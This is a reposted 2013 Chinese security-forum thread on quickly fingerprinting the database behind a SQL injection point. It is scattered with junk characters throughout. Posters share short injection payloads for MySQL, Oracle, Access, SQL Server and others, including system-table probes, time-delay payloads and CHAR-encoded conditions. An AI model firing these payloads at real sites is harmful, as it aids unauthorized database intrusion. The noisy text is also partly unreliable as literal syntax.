一个注射点如何最快速确认是什么类型数据库5 Z( Q/ J! _) L. z
xsser (十根阳具有长短!!) | 2013-02-05 12:367 p t" @5 T( T! l' H+ Z
假设这么一个注射点:- g5 A5 @. W- a( B! t! U
show.html?id=2
" O1 }" c5 h) @+ V. A# w# V# e2 emysql:id=2 and version()>0
( Z q4 I" A0 z2 Qoracle:id=2 and '1'||'1'='11- ^! K5 ?& m! e
其他的欢迎补充4 K! `" v: f o
1#
; L5 t+ h# V: D- aupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 12:47
. ~& i5 O# L5 } SAccess:
' Z5 k9 t g, n$ x% \aNd aSc(cHr(97))=970 ^. v. d0 |' | m
and exists(select id from MSysAccessObjects)3 z E' ?" e4 {
SQL Server:& r. b& S0 |6 s$ r! \
and exists(select id from sysobjects)
1 l: c( v" q. sand length(user)>0
- D% {7 x" o3 qMySQL:; y# Q! t1 u' v7 y
and length(user())>01 a4 O: [0 y1 C, a$ a2 h6 n
2#4 `1 T9 N4 K* G2 k+ q' {2 q9 a
xsser (十根阳具有长短!!) | 2013-02-05 12:48
: M( y, E" Y' v@upload 如果这些都不是呢…6 h1 ^* U+ q# Y E5 W- L* I/ F
3#0 M5 C5 m7 o/ m, S! R
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:030 ?4 @ o# C. V- Q! ]# a9 l G
@xsser 不快速的,延时注入) z% x' I |' G: E6 N6 m% o
不知道这样写对不对$ V: S& s! c% B5 g
mssql:id=2 and IF(ascii(SUBSTRING('name',1,1))>0)waitfor delay'0:00:3'
) M& X3 }8 ~# U' rmysql:id=2 and select benchmark(1e8,current_date());% s( k+ o7 w2 A4 x& L' x
4#8 p7 r# F7 M+ t* d
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:10
7 Q( |: ] r/ J最快的貌似是看报错信息
* x# [ n/ s, |% { { x0 C' voracle error
& E Y3 o x/ L7 H9 N; L* ]% B% M3 @* smssql error
1 c# H m! E/ \$ ~* dmysql error
1 D/ _6 Z4 V+ Y! ^, N; w5#
$ G% `+ f n) b! v% i! ^Nimda (你们都是坏银~) | 2013-02-05 13:14
8 L. r4 i3 L" X9 l+ D小菜献丑来一发 Oracle:id=2 and 0<>(select count(*) from dual)0 g6 c" H& H0 g$ N) A7 a2 ]$ Q
6#8 p' c z1 @* _; O9 {' X e, @( L
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:21# K" }6 `1 k7 E, K/ M4 \! q5 R& q: N
“/*”是MySQL中的注释符,返回错误说明该注入点不是MySQL,继续提交如下查询字符:3 R u) w5 u" J+ W* A
“–”是Oracle和MSSQL支持的注释符,如果返回正常,则说明为这两种数据库类型之一。继续提交如下查询字符:
+ R6 l( d, z& B, \& {# Y" Z“;”是子句查询标识符,Oracle不支持多行查询,因此如果返回错误,则说明很可能是Oracle数据库。# v# g1 p" l9 O7 n @
7#
3 E3 _8 q1 k7 k7 @ d! [$ |_Evil (HackEnd) | 2013-02-05 13:33
8 ~% Q6 u& Z2 R! e; k1 V* ?PostgreSQL) m+ ?& U( B! P8 ]
8#: ^. }0 R8 k( `' s4 [) u8 F
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:42
S9 d7 S$ ^/ j! a, I* B1 g" S; O切换编码 and 1=12 G \* G$ \9 n9 i, {! a4 T
oracle:1 `8 P- R3 Y# z: @3 G! Z
CHR(97) || CHR(110) || CHR(100) || CHR(32) || CHR(49) || CHR(61) || CHR(49)
' d8 d" u* M" j6 {: [: Hmssql:
+ [2 }7 K# o( R: r3 w5 I! ^0 `CHAR(97) + CHAR(110) + CHAR(100) + CHAR(32) + CHAR(49) + CHAR(61) + CHAR(49)
* ~9 ~ U/ Y" @; W3 w% {$ n0 q' Wmysql:
$ ?$ M, q7 h% t! C) _% S1 VCHAR(97, 110, 100, 32, 49, 61, 49)
$ J$ r0 o; ?% s3 M! ]' o+ C2 H9# E3 d/ ]' h1 J7 U$ G! S
xsser (十根阳具有长短!!) | 2013-02-05 14:31
2 U3 F6 R! U9 ~@upload 比较常见的数据库这些还是可以判断的,但是还有其他奇葩类型的呢?
; E' E+ m+ n( I+ c! v" N10#
* l( j' r ^1 K, gupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 14:46
; V2 o1 t: H% O@xsser 是奇葩数据库类型的么?8 {. i4 V" x- h9 j4 [# Q
根据注入的原理,我们可以猜想,要成功的注入,必须使得注入后的一片和谐,那么使用该类数据库特性来判断,综上所述:
+ Z, g, [9 ]6 M# [1.是否可以使用特定的函数来判断,该数据库特有的9 c4 S# Q* q# @$ |
2.是否可以使用辅助的符号来判断,如注释符号、多语句查询符等等
( T+ Z. B5 \' X+ } d3.是否可以编码查询0 m0 U: m2 l% ]6 M5 R( v
4.是否显可以利用错信息
4 _% o) S r0 k6 Y4 U( o5.是否存在数据库某些特性辅助判断
4 x; D6 L* w4 r; A4 }4 G7 y( D2 P7 o个人见解
$ E* l6 P! i1 A' E. q5 {# C. m11#) p: M; w2 z6 ^" f* W$ \
小胖子 (z7y壮士,来,干了这碗酒!) | 2013-02-05 14:554 z( m. A0 G% N( k' y- n5 j2 y
已收藏,mssql可以直接看到错误提示的吧~( i4 R0 F3 c0 k
12#
& P# V& d7 a$ w* h& jPasser_by | 2013-02-05 15:09' P7 B5 c5 N0 [2 W
曾被 @GaRY 面过我这题。。。紧张了。。后来回家sqlmap判断注射点的时候抓包看了下。。。一抓包全出来了居然。。% h' j6 _" i. M
from:http://zone.wooyun.org/content/260 |
发表于 2013-2-11 09:54:04
收藏
支持
反对